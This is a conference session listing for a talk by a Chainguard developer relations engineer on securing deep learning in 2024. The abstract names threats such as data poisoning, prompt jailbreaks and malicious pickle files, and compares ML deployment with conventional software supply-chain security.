The Old, the New, and the Strange: Securing Deep Learning in 2024
The Old, the New, and the Strange: Securing Deep Learning in 2024
Brazos E
Patrick Smyth
|
Staff Developer Relations Engineer, Chainguard
Wed 01:50PM - 02:30PM, September 11th
Data poisoning. Input manipulation. Model inversion. As companies race to incorporate deep learning into production applications, we've been introduced to exciting new threats, among them exotic prompt jailbreaks and even the feared dirty pickle attack. However, how much is totally new under the sun, and how much have we seen before? What can we learn from prior cycles of threat and mitigation in the software industry that can be applied to this new ML landscape? In this talk, we'll approach new threats in deep learning by comparing the deployment of ML models to the deployment of conventional software artifacts. We'll take a tour of some of the stranger attack vectors for AI applications to determine which conventional mitigations will work in the world of models and which threat vectors are truly new, requiring new approaches. We'll also demo Chainguard's approach to deep learning infrastructure and model security, with particular attention to AI image bloat and upstream attacks. And, yes, we'll give you some tips on dealing with the dreaded dirty pickle.